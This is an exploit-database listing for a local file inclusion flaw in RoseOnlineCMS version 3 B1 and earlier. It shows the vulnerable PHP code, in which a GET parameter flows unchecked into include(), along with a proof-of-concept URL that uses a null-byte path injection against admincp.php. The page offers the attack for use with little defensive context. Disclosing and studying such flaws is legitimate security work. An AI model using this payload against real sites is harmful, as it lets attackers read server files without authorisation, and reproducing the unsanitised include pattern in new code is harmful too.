[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

RoseOnlineCMS <= 3 B1 (admin) Local File Inclusion

Author
cr4wl3r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10532
Category
web applications
Date add
30-12-2009
Platform
unsorted
==================================================
RoseOnlineCMS <= 3 B1 (admin) Local File Inclusion
==================================================

                            \#'#/
                            (-.-)
   --------------------oOO---(_)---OOo-------------------
   | RoseOnlineCMS <= 3 B1 (admin) Local File Inclusion |
   |      (works only with magic_quotes_gpc = off)      |
   ------------------------------------------------------
[!] Discovered: cr4wl3r 
[!] Download: http://sourceforge.net/projects/rosecms/files/
[!] Remote: yes
 
[!] Code :
 
<?PHP
if (isset($_GET['write'])) {
    $argv = explode('-',$_GET['write']);
    settype($argv,'array');
    $_GET['admin'] = @$argv[0];
    $_GET['url'] = @$argv[1];
    $_GET['do'] = @$argv[2];
    $_GET['key'] = @$argv[3];
}
$admin = !isset($_GET['admin']) ? index : $_GET['admin'] ;
 
   if (is_file("modules/admin/".$admin.".php")) {
        include("modules/admin/".$admin.".php");
     
   } else {
        echo('Administrator page not found.
                    <br><br> <a href=index.php>Click here to go back home</a>');
   }
 
ob_end_flush();
?>
 
[!] PoC:
 
    [RoseOnlineCMS_path]/modules/admincp.php?admin=[LFI%00]



#  0day.today [2024-12-24]  #